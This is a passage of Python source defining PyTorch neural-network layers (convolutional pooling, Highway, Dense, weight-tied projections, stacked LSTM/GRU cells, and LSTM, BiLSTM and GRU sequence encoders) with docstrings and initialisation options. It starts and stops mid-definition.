self.convs = nn.ModuleList(convs)
def transform_input(self, t: torch.Tensor) -> torch.Tensor:
if self.input_fmt == "bth" or self.input_fmt == "btc":
return bth2bht(t)
elif self.input_fmt == "tbh" or self.input_fmt == "tbc":
return tbh2bht(t)
else:
return t
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""Transform the input to `[B, C, T]` from any orientation and perform parallel 1D convs and max over time pool
:param inputs: An input tensor of any format specified in the constructor
:return: A `[B, H]` tensor representing the pooled outputs
"""
mots = []
input_bct = self.transform_input(inputs)
for conv in self.convs:
# In Conv1d, data BxCxT, max over time
conv_out = conv(input_bct)
mot, _ = conv_out.max(2)
mots.append(mot)
mots = torch.cat(mots, 1)
return mots # self.conv_drop(mots)
class Highway(nn.Module):
    """Highway layer as defined in https://arxiv.org/abs/1505.00387."""

    def __init__(self, input_size: int, **kwargs):
        """Highway layer constructor.

        :param input_size: The input hidden size
        :param kwargs: unused, accepted for interface compatibility
        """
        super().__init__()
        self.proj = nn.Linear(input_size, input_size)
        self.transform = nn.Linear(input_size, input_size)
        # Bias the transform gate negative so the layer starts near pass-through
        self.transform.bias.data.fill_(-2.0)
        self.output_dim = input_size

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Mix a transformed projection with the input via a learned gate.

        :param input: Input tensor
        :return: output tensor of the same shape
        """
        transformed = torch.relu(self.proj(input))
        gate = torch.sigmoid(self.transform(input))
        return gate * transformed + (1 - gate) * input
def pytorch_linear(in_sz: int, out_sz: int, unif: float = 0, initializer: Optional[str] = None, bias: bool = True):
    """Utility function that wraps a linear (AKA dense) layer creation, with options for weight init and bias.

    :param in_sz: The number of input features
    :param out_sz: The number of output features
    :param unif: If > 0, init weights uniformly in `[-unif, unif]`
    :param initializer: `ortho`, `he`/`kaiming`, or default Xavier/Glorot
    :param bias: Include a (zero-initialized) bias?
    :return: The initialized `nn.Linear`
    """
    l = nn.Linear(in_sz, out_sz, bias=bias)
    if unif > 0:
        l.weight.data.uniform_(-unif, unif)
    elif initializer == "ortho":
        # In-place `_` variants: `nn.init.orthogonal`/`kaiming_uniform` (no
        # trailing underscore) are deprecated and removed in newer PyTorch.
        nn.init.orthogonal_(l.weight)
    elif initializer == "he" or initializer == "kaiming":
        nn.init.kaiming_uniform_(l.weight)
    else:
        nn.init.xavier_uniform_(l.weight)
    if bias:
        l.bias.data.zero_()
    return l
class StackedLSTMCell(nn.Module):
    """A stack of LSTM cells applied at a single timestep."""

    def __init__(self, num_layers: int, input_size: int, rnn_size: int, dropout: float):
        """
        :param num_layers: How many cells to stack
        :param input_size: Feature size of the input to the bottom cell
        :param rnn_size: Hidden size of every cell
        :param dropout: Dropout applied between layers (not after the top layer)
        """
        super().__init__()
        self.dropout = nn.Dropout(dropout)
        self.num_layers = num_layers
        self.layers = nn.ModuleList()
        feat = input_size
        for _ in range(num_layers):
            self.layers.append(nn.LSTMCell(input_size=feat, hidden_size=rnn_size, bias=False))
            feat = rnn_size

    def forward(self, input: torch.Tensor, hidden: torch.Tensor):
        """Apply the stack of LSTM cells for one step.

        :param input: The input to the first LSTM `[B, H]`
        :param hidden: The previous `(h, c)` where `h=(h_0, h_1,..)`, `c=(c_0, c_1,..)`
        :return: The output and hidden `(h, c)` where `h=(h_0, h_1,..)`, `c=(c_0, c_1,..)`
        """
        h_prev, c_prev = hidden
        new_hs: List[torch.Tensor] = []
        new_cs: List[torch.Tensor] = []
        for idx, cell in enumerate(self.layers):
            h_i, c_i = cell(input, (h_prev[idx], c_prev[idx]))
            new_hs.append(h_i)
            new_cs.append(c_i)
            # Dropout between layers only; the top layer's output is untouched
            input = self.dropout(h_i) if idx != self.num_layers - 1 else h_i
        return input, (torch.stack(new_hs), torch.stack(new_cs))
class StackedGRUCell(nn.Module):
    """A stack of GRU cells applied at a single timestep."""

    def __init__(self, num_layers: int, input_size: int, rnn_size: int, dropout: float):
        """
        :param num_layers: How many cells to stack
        :param input_size: Feature size of the input to the bottom cell
        :param rnn_size: Hidden size of every cell
        :param dropout: Dropout applied between layers (not after the top layer)
        """
        super().__init__()
        self.dropout = nn.Dropout(dropout)
        self.num_layers = num_layers
        self.layers = nn.ModuleList()
        for i in range(num_layers):
            self.layers.append(nn.GRUCell(input_size=input_size, hidden_size=rnn_size))
            input_size = rnn_size

    def forward(self, input: torch.Tensor, hidden: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Apply a stack of GRUs.

        :param input: The input to the first GRU `[B, H]`
        :param hidden: The previous `h` where `h=(h_0, h_1,..)`
        :return: The output and hidden `h` where `h=(h_0, h_1,..)`
        """
        h_0 = hidden
        hs = []
        for i, layer in enumerate(self.layers):
            h_i = layer(input, (h_0[i]))
            input = h_i
            # BUGFIX: was `i != self.num_layers`, which is always true and so
            # dropped the *final* layer's output too, unlike StackedLSTMCell.
            if i != self.num_layers - 1:
                input = self.dropout(input)
            hs.append(h_i)
        hs = torch.stack(hs)
        return input, hs
class Dense(nn.Module):
    """Dense (Linear) layer with an optional activation.

    The PyTorch counterpart of `tf.keras.layers.Dense`, with the activation
    optionally fused into the module.
    """

    def __init__(
        self,
        insz: int,
        outsz: int,
        activation: Optional[str] = None,
        unif: float = 0,
        initializer: Optional[str] = None,
    ):
        """Constructor for "dense" or "linear" layer, with optional activation applied.

        :param insz: The number of hidden units in the input
        :param outsz: The number of hidden units in the output
        :param activation: The activation function by name, defaults to `None` (no activation)
        :param unif: An optional initialization value for linear weights; if given, biases init to 0
        :param initializer: An initialization scheme by name: `ortho`, `kaiming`/`he`, `xavier`/`glorot`
        """
        super().__init__()
        self.layer = pytorch_linear(insz, outsz, unif, initializer)
        self.activation = get_activation(activation)
        self.output_dim = outsz

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Project the input, then apply the configured activation.

        :param input: the input tensor
        :return: the transformed output
        """
        projected = self.layer(input)
        return self.activation(projected)
class WeightTieDense(nn.Module):
    """Do weight tying from the input parameter.

    This module never copies the weight pointer, it lazily accesses to allow the tied variable to
    reset its parameters after initialization. This is helpful for cases where we have LMs and are
    reloading them after they have been initially created.
    """

    def __init__(self, tie: nn.Module, bias=False):
        """
        :param tie: The module to tie to; either exposes an `embeddings` attribute (used as-is)
            or a `weight` attribute (used transposed)
        :param bias: If `True`, add a learnable zero-initialized bias sized to the output dim
        """
        super().__init__()
        self.tie = tie
        self.transform = self._get_transform(tie)
        if bias:
            # BUGFIX: size the bias from the output dim of the *transformed weight*.
            # Previously the transform was applied to the int `weight.shape[0]`,
            # which crashes for the transpose (linear-tie) case and would mis-size
            # the bias relative to F.linear's output.
            bias = torch.nn.Parameter(torch.zeros(self.transform(self.weight).shape[0]))
        else:
            bias = None
        self.register_parameter("bias", bias)

    def _get_transform(self, tie: nn.Module):
        """Pick identity for embedding-style weights, transpose for linear-style ones."""
        emb = getattr(tie, "embeddings", None)
        if emb is not None:
            return self._identity
        return self._transpose

    @property
    def weight(self):
        """Lazily fetch the tied weight so re-initialization of `tie` is respected."""
        emb = getattr(self.tie, "embeddings", None)
        if emb is not None:
            return getattr(emb, "weight")
        return getattr(self.tie, "weight")

    def _identity(self, x: torch.Tensor) -> torch.Tensor:
        return x

    def _transpose(self, x: torch.Tensor) -> torch.Tensor:
        return x.transpose(0, 1).contiguous()

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Apply the tied projection: `input @ transform(weight)^T + bias`."""
        return F.linear(input, self.transform(self.weight), self.bias)
class ResidualBlock(nn.Module):
    """Wrap a layer with an additive skip (residual) connection."""

    def __init__(self, layer: Optional[nn.Module] = None, **kwargs):
        """Wrap a layer with a residual connection.

        :param layer: This layer will be applied to the input and added to the input
        :param kwargs: unused, accepted for interface compatibility
        """
        super().__init__()
        self.layer = layer
        # Surface the wrapped layer's output_dim when it exposes one
        if layer is not None and hasattr(layer, "output_dim"):
            self.output_dim = layer.output_dim

    def forward(self, input: torch.Tensor) -> torch.Tensor:
        """Apply the wrapped layer and add the input back in.

        :param input: A tensor to use as input and to add to output
        :return: The residual connection output
        """
        return self.layer(input) + input
class SkipConnection(ResidualBlock):
    """A `ResidualBlock` wrapping a same-size `Dense` layer with a given activation."""

    def __init__(self, input_size: int, activation: str = "relu"):
        """Create a `SkipConnection`.

        :param input_size: The input dimension size
        :param activation: A string activation name
        """
        # The Dense layer maps input_size -> input_size so the residual add is valid
        super().__init__(Dense(input_size, input_size, activation=activation))
        self.output_dim = input_size
def rnn_cell(insz: int, hsz: int, rnntype: str, nlayers: int, dropout: float):
    """Wrapper function around a stacked RNN cell.

    :param insz: The input dimensions
    :param hsz: The hidden dimensions
    :param rnntype: An RNN type `gru` or `lstm` (anything else gets LSTM)
    :param nlayers: The number of layers to stack
    :param dropout: The amount of dropout
    :return: The stacked cell module
    """
    Cell = StackedGRUCell if rnntype == "gru" else StackedLSTMCell
    return Cell(nlayers, insz, hsz, dropout)
def pytorch_lstm(
    insz: int,
    hsz: int,
    rnntype: str,
    nlayers: int,
    dropout: float,
    unif: float = 0,
    batch_first: bool = False,
    initializer: Optional[str] = None,
) -> torch.nn.LSTM:
    """Wrapper around `torch.nn.LSTM`, mainly for weight initialization options.

    :param insz: The input dimension
    :param hsz: The number of hidden units
    :param rnntype: A string description of the type of LSTM: `bi?lstm` or `lstm`
    :param nlayers: The number of layers
    :param dropout: How much dropout to apply
    :param unif: if uniform initialization, what range?
    :param batch_first: Should we do the RNN batch first or time first
    :param initializer: An optional string representing a style of initialization `ortho`, `he`/`kaiming`, `xavier`/`glorot`
    :return: An LSTM
    """
    if nlayers == 1:
        # nn.LSTM warns if dropout is set with a single layer
        dropout = 0.0
    # Anything starting with 'b' (e.g. 'blstm', 'bilstm') is bidirectional; the
    # per-direction hidden size is halved so the concatenated output is hsz
    ndir = 2 if rnntype.startswith("b") else 1
    layer_hsz = hsz // ndir
    rnn = torch.nn.LSTM(
        insz, layer_hsz, nlayers, dropout=dropout, bidirectional=True if ndir > 1 else False, batch_first=batch_first
    )  # , bias=False)
    # Use the in-place `_` init variants; the non-underscore forms
    # (`nn.init.orthogonal`, `nn.init.kaiming_uniform`) are deprecated.
    if initializer == "ortho":
        nn.init.orthogonal_(rnn.weight_hh_l0)
        nn.init.orthogonal_(rnn.weight_ih_l0)
    elif initializer == "he" or initializer == "kaiming":
        nn.init.kaiming_uniform_(rnn.weight_hh_l0)
        nn.init.kaiming_uniform_(rnn.weight_ih_l0)
    elif unif > 0:
        for weight in rnn.parameters():
            weight.data.uniform_(-unif, unif)
    else:
        nn.init.xavier_uniform_(rnn.weight_hh_l0)
        nn.init.xavier_uniform_(rnn.weight_ih_l0)
    return rnn
class LSTMEncoderBase(nn.Module):
    """The LSTM encoder is a base for a set of encoders producing various outputs.

    All LSTM encoders inheriting this class will trim the input to the max length given in the batch.
    For example, if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting
    sequence, if produced, will be length `S` (or more precisely, `[B, S, H]`)

    *PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first
    (`[T, B, H]`) and this is the PyTorch default. There is an extra parameter in all of these models
    called `batch_first` which controls this. Currently, the default is time first
    (`batch_first=False`), which differs from TensorFlow. To match the TF impl, set `batch_first=True`.

    *PyTorch Note*: Most `LSTMEncoder` variants just define the `forward`. This module cannot
    provide the same utility as the TensorFlow `LSTMEncoder` base right now, because the JIT isnt
    handling subclassing of forward properly.
    """

    def __init__(
        self,
        insz: int,
        hsz: int,
        nlayers: int,
        pdrop: float = 0.0,
        requires_length: bool = True,
        batch_first: bool = False,
        unif: float = 0,
        initializer: Optional[str] = None,
        **kwargs,
    ):
        """Produce a stack of LSTMs with dropout performed on all but the last layer.

        :param insz: The size of the input
        :param hsz: The number of hidden units per LSTM
        :param nlayers: The number of layers of LSTMs to stack
        :param pdrop: The probability of dropping a unit value during dropout, defaults to 0
        :param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
        :param batch_first: PyTorch only! Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
        :param unif: PyTorch only! Initialization parameters for RNN
        :param initializer: PyTorch only! A string describing optional initialization type for RNN
        """
        super().__init__()
        self.requires_length = requires_length
        self.batch_first = batch_first
        self.nlayers = nlayers
        if nlayers == 1:
            # nn.LSTM warns if dropout is set with a single layer
            pdrop = 0.0
        self.rnn = torch.nn.LSTM(insz, hsz, nlayers, dropout=pdrop, bidirectional=False, batch_first=batch_first)
        # Use the in-place `_` init variants; the non-underscore forms
        # (`nn.init.orthogonal`, `nn.init.kaiming_uniform`) are deprecated.
        if initializer == "ortho":
            nn.init.orthogonal_(self.rnn.weight_hh_l0)
            nn.init.orthogonal_(self.rnn.weight_ih_l0)
        elif initializer == "he" or initializer == "kaiming":
            nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
            nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
        elif unif > 0:
            for weight in self.rnn.parameters():
                weight.data.uniform_(-unif, unif)
        else:
            nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
            nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
        self.output_dim = hsz

    def extract_top_state(self, state: Tuple[torch.Tensor, torch.Tensor]) -> List[torch.Tensor]:
        """Get a view of the top state of shape `[B, H]`.

        :param state: The `(h, c)` state tuple, each shaped `[L, B, H]`
        :return: A list of the topmost `[B, H]` states, one per element of `state`
        """
        # Select the topmost layer with -1; the only direction is forward (select with 0)
        return [s.view(self.nlayers, 1, -1, self.output_dim)[-1, 0] for s in state]
class LSTMEncoderSequence(LSTMEncoderBase):
    """LSTM encoder that returns the transduced output sequence.

    Takes a `(tensor, lengths)` pair of shapes `[B, T, C]` and `[B]` and
    produces a sequence of shape `[B, S, H]` where `S = max(lengths)` — so the
    output may be shorter than `T` when `max(lengths) < T`.

    *PyTorch Note:* The input is `[B, T, C]` or `[T, B, C]` depending on
    `batch_first` (defaulting to `[T, B, C]` like other PyTorch modules), and
    the output keeps the same orientation.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Run the LSTM stack over a packed sequence and return the padded outputs.

        The value `S` here is defined as `max(lengths)`, `S <= T`

        :param inputs: sequence of shapes `[B, T, C]` or `[T, B, C]` and a lengths of shape `[B]`
        :return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on setting of `batch_first`
        """
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, _ = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return unpacked
class LSTMEncoderWithState(nn.Module):
    """LSTM encoder producing the hidden state and the output, where the input doesnt require any padding.

    PyTorch note: This type of encoder doesnt inherit the `LSTMEncoderBase` base.
    """

    def __init__(
        self,
        insz: int,
        hsz: int,
        nlayers: int,
        pdrop: float = 0.0,
        batch_first: bool = False,
        unif: float = 0,
        initializer: Optional[str] = None,
        **kwargs,
    ):
        """
        :param insz: The size of the input
        :param hsz: The number of hidden units per LSTM
        :param nlayers: The number of layers of LSTMs to stack
        :param pdrop: The probability of dropping a unit value during dropout, defaults to 0
        :param batch_first: PyTorch only! do batch first or time-first input? Defaults to `False` (differs from TF!)
        :param unif: PyTorch only! Initialization parameters for RNN
        :param initializer: PyTorch only! A string describing optional initialization type for RNN
        """
        super().__init__()
        self.requires_length = False
        # Callers must thread the previous hidden state through each call
        self.requires_state = True
        self.batch_first = batch_first
        self.nlayers = nlayers
        if nlayers == 1:
            # nn.LSTM warns if dropout is set with a single layer
            pdrop = 0.0
        self.rnn = torch.nn.LSTM(insz, hsz, nlayers, dropout=pdrop, bidirectional=False, batch_first=batch_first)
        # Use the in-place `_` init variants; the non-underscore forms
        # (`nn.init.orthogonal`, `nn.init.kaiming_uniform`) are deprecated.
        if initializer == "ortho":
            nn.init.orthogonal_(self.rnn.weight_hh_l0)
            nn.init.orthogonal_(self.rnn.weight_ih_l0)
        elif initializer == "he" or initializer == "kaiming":
            nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
            nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
        elif unif > 0:
            for weight in self.rnn.parameters():
                weight.data.uniform_(-unif, unif)
        else:
            nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
            nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
        self.output_dim = hsz

    def forward(self, input_and_prev_h: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        :param input_and_prev_h: The input at this timestep and the previous hidden unit or `None`
        :return: Raw `torch.nn.LSTM` output
        """
        inputs, hidden = input_and_prev_h
        output, hidden = self.rnn(inputs, hidden)
        return output, hidden  ##concat_state_dirs(hidden)
class LSTMEncoderAll(LSTMEncoderBase):
    """LSTM encoder that passes along the full output and hidden states for each layer.

    Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`.
    Returns a 2-tuple: the output sequence `[B, S, H]` (`S = max(lengths)`) and the
    `(hidden, context)` pair, each `[L, B, H]`.

    *PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on
    `batch_first` (defaulting to `True` in PyTorch usage here).
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        :param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
        :return: An output tensor `[B, S, H]` or `[B, H, S]` , and tuple of hidden `[L, B, H]` and context `[L, B, H]`
        """
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return unpacked, final_state
class LSTMEncoderHidden(LSTMEncoderBase):
    """LSTM encoder that returns only the top hidden state.

    Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`
    and returns a hidden unit tensor of shape `[B, H]`.

    *PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on
    `batch_first` (defaulting to `True` in PyTorch usage here).
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """
        :param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
        :return: An output tensor of shape `[B, H]` representing the last RNNs hidden state
        """
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed)
        # Unpack for parity with the other encoders even though only state is used
        _, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return self.extract_top_state(final_state)[0]
# TODO: this module only exists in pytorch. Do we eliminate it or put it in both?
class LSTMEncoderSequenceHiddenContext(LSTMEncoderBase):
    """LSTM encoder returning both the output sequence and the top `(h, c)` states."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return unpacked, self.extract_top_state(final_state)
class BiLSTMEncoderBase(nn.Module):
    """BiLSTM encoder base for a set of encoders producing various outputs.

    All BiLSTM encoders inheriting this class will trim the input to the max length given in the
    batch. For example, if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the
    resulting sequence, if produced, will be length `S` (or more precisely, `[B, S, H]`). Because
    its bidirectional, half of the hidden units given in the constructor will be applied to the
    forward direction and half to the backward direction, and these will get concatenated.

    *PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first
    (`[T, B, H]`) and this is the PyTorch default. There is an extra parameter in all of these
    models called `batch_first` which controls this. Currently, the default is time first
    (`batch_first=False`), which differs from TensorFlow. To match the TF impl, set `batch_first=True`.

    *PyTorch Note*: Most `BiLSTMEncoder` variants just define the `forward`. This module cannot
    provide the same utility as the TensorFlow `BiLSTMEncoder` base right now, because the JIT isnt
    handling subclassing of forward properly.
    """

    def __init__(
        self,
        insz: int,
        hsz: int,
        nlayers: int,
        pdrop: float = 0.0,
        requires_length: bool = True,
        batch_first: bool = False,
        unif: float = 0,
        initializer: Optional[str] = None,
        **kwargs,
    ):
        """Produce a stack of LSTMs with dropout performed on all but the last layer.

        :param insz: The size of the input
        :param hsz: The number of hidden units per BiLSTM (`hsz//2` used for each direction and concatenated)
        :param nlayers: The number of layers of BiLSTMs to stack
        :param pdrop: The probability of dropping a unit value during dropout, defaults to 0
        :param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
        :param batch_first: Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
        :param unif: PyTorch only! Initialization parameters for RNN
        :param initializer: PyTorch only! A string describing optional initialization type for RNN
        """
        super().__init__()
        self.requires_length = requires_length
        self.batch_first = batch_first
        self.nlayers = nlayers
        if nlayers == 1:
            # nn.LSTM warns if dropout is set with a single layer
            pdrop = 0.0
        # hsz // 2 per direction so the concatenated output dim is hsz
        self.rnn = torch.nn.LSTM(insz, hsz // 2, nlayers, dropout=pdrop, bidirectional=True, batch_first=batch_first)
        # Use the in-place `_` init variants; the non-underscore forms
        # (`nn.init.orthogonal`, `nn.init.kaiming_uniform`) are deprecated.
        if initializer == "ortho":
            nn.init.orthogonal_(self.rnn.weight_hh_l0)
            nn.init.orthogonal_(self.rnn.weight_ih_l0)
        elif initializer == "he" or initializer == "kaiming":
            nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
            nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
        elif unif > 0:
            for weight in self.rnn.parameters():
                weight.data.uniform_(-unif, unif)
        else:
            nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
            nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
        self.output_dim = hsz

    def extract_top_state(self, state):
        """Get the topmost `[B, H]` state from each element of a (direction-concatenated) state.

        Expects state tensors whose directions were already merged (e.g. via
        `concat_state_dirs`), i.e. shaped `[L, B, H]`.
        """
        # Select the topmost layer with -1; after concatenation the dir axis has size 1
        return tuple(s.view(self.nlayers, 1, -1, self.output_dim)[-1, 0] for s in state)
# TODO: this module only exists in pytorch. Do we eliminate it or put it in both?
class BiLSTMEncoderSequenceHiddenContext(BiLSTMEncoderBase):
    """BiLSTM encoder returning the output sequence plus the top (dir-merged) `(h, c)` states."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        # Merge directions before selecting the top layer's state
        return unpacked, self.extract_top_state(concat_state_dirs(final_state))
class BiLSTMEncoderAll(BiLSTMEncoderBase):
    """BiLSTM encoder that passes along the full output and hidden states for each layer.

    Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`.
    Returns the output sequence `[B, S, H]` (`S = max(lengths)`) plus the direction-merged
    `(hidden, context)` pair, each `[L, B, H]`.

    *PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on
    `batch_first` (defaulting to `True` in PyTorch usage here).
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        :param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
        :return: An output tensor `[B, S, H] or `[B, H, S]` , and tuple of hidden `[L, B, H]` and context `[L, B, H]`
        """
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return unpacked, concat_state_dirs(final_state)
class BiLSTMEncoderSequence(BiLSTMEncoderBase):
    """BiLSTM encoder that returns the transduced output sequence.

    Takes a `(tensor, lengths)` pair of shapes `[B, T, C]` and `[B]` and produces a sequence
    of shape `[B, S, H]` where `S = max(lengths)` — so the output may be shorter than `T`
    when `max(lengths) < T`.

    *PyTorch Note:* The input is `[B, T, C]` or `[T, B, C]` depending on `batch_first`
    (defaulting to `[T, B, C]` like other PyTorch modules); output keeps the same orientation.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Run the BiLSTM stack over a packed sequence and return the padded outputs.

        The value `S` here is defined as `max(lengths)`, `S <= T`

        :param inputs: sequence of shapes `[B, T, C]` or `[T, B, C]` and a lengths of shape `[B]`
        :return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on setting of `batch_first`
        """
        seq, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(seq, lengths.cpu(), batch_first=self.batch_first)
        packed_out, _ = self.rnn(packed)
        unpacked, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        return unpacked
class BiLSTMEncoderHidden(BiLSTMEncoderBase):
    """BiLSTM encoder that returns only the topmost hidden state.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`, and produces a hidden state
    tensor of shape `[B, H]` from the top layer (directions concatenated).
    """

    def forward(self, inputs):
        """Encode the sequence and extract the top layer's hidden state.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: A tensor of shape `[B, H]` holding the final RNN hidden state
        """
        seq, seq_lengths = inputs
        packed_seq = torch.nn.utils.rnn.pack_padded_sequence(seq, seq_lengths.cpu(), batch_first=self.batch_first)
        packed_out, final_state = self.rnn(packed_seq)
        padded_out, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_out, batch_first=self.batch_first)
        # Index [0] selects the hidden state (h) from the (h, c) pair
        return self.extract_top_state(concat_state_dirs(final_state))[0]
# TODO: Add this to TF or remove
class BiLSTMEncoderHiddenContext(BiLSTMEncoderBase):
    """BiLSTM encoder returning the top layer's `(hidden, context)` state pair."""

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Encode a `(sequence, lengths)` pair and return the top `(h, c)` states.

        :param inputs: The sequence tensor and its lengths `[B]`
        :return: The top layer's hidden and context states (directions concatenated)
        """
        tbc, lengths = inputs
        packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
        output, hidden = self.rnn(packed)
        # output is trimmed to max(lengths) but unused here; only the states are returned
        output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
        return self.extract_top_state(concat_state_dirs(hidden))
class GRUEncoderBase(nn.Module):
    """Base class for a stack of unidirectional GRU encoders.

    Encoders inheriting this class trim the input to the max length given in the batch:
    for an input of `[B, T, C]` with `S = max(lengths)`, any produced sequence is length
    `S` (i.e. `[B, S, H]`).

    *PyTorch Note*: PyTorch defaults to time-first input (`[T, B, H]`); the `batch_first`
    parameter controls this and defaults to `False` here, which differs from TensorFlow.
    Set `batch_first=True` to match the TF implementation.

    *PyTorch Note*: Subclasses only define `forward`; the JIT does not handle subclassed
    forwards well enough for this base to provide the same utility as the TF version.
    """

    def __init__(
        self,
        insz: int,
        hsz: int,
        nlayers: int,
        pdrop: float = 0.0,
        requires_length: bool = True,
        batch_first: bool = False,
        unif: float = 0,
        initializer: str = None,
        **kwargs,
    ):
        """Produce a stack of GRUs with dropout performed on all but the last layer.

        :param insz: The size of the input
        :param hsz: The number of hidden units per GRU
        :param nlayers: The number of layers of GRUs to stack
        :param pdrop: The probability of dropping a unit value during dropout, defaults to 0
        :param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
        :param batch_first: PyTorch only! Batch-first input? Defaults to `False` (differs from TF!)
        :param unif: PyTorch only! Uniform initialization bound for the RNN weights
        :param initializer: PyTorch only! Optional initialization type ("ortho", "he"/"kaiming", default xavier)
        """
        super().__init__()
        self.requires_length = requires_length
        self.batch_first = batch_first
        self.nlayers = nlayers
        # Inter-layer dropout is meaningless (and warns) for a single layer
        dropout = 0.0 if nlayers == 1 else pdrop
        self.rnn = torch.nn.GRU(insz, hsz, nlayers, dropout=dropout, bidirectional=False, batch_first=batch_first)
        if initializer == "ortho":
            nn.init.orthogonal_(self.rnn.weight_ih_l0)
            nn.init.orthogonal_(self.rnn.weight_hh_l0)
        elif initializer in ("he", "kaiming"):
            nn.init.kaiming_uniform_(self.rnn.weight_ih_l0)
            nn.init.kaiming_uniform_(self.rnn.weight_hh_l0)
        elif unif > 0:
            for weight in self.rnn.parameters():
                weight.data.uniform_(-unif, unif)
        else:
            nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
            nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
        self.output_dim = hsz

    def extract_top_state(self, state: torch.Tensor) -> torch.Tensor:
        """Select the hidden state of the topmost layer"""
        return state[-1]
class GRUEncoderSequence(GRUEncoderBase):
    """GRU encoder producing only the transduced output sequence.

    Consumes a tuple of a sequence tensor shaped `[B, T, C]` (or `[T, B, C]` when
    `batch_first` is `False`) and a lengths vector `[B]`, and produces the padded output
    sequence `[B, S, H]` with `S = max(lengths)`, which may be shorter than `T`.
    """

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Encode a `(sequence, lengths)` pair into the last layer's output sequence.

        :param inputs: The sequence tensor and its lengths `[B]`
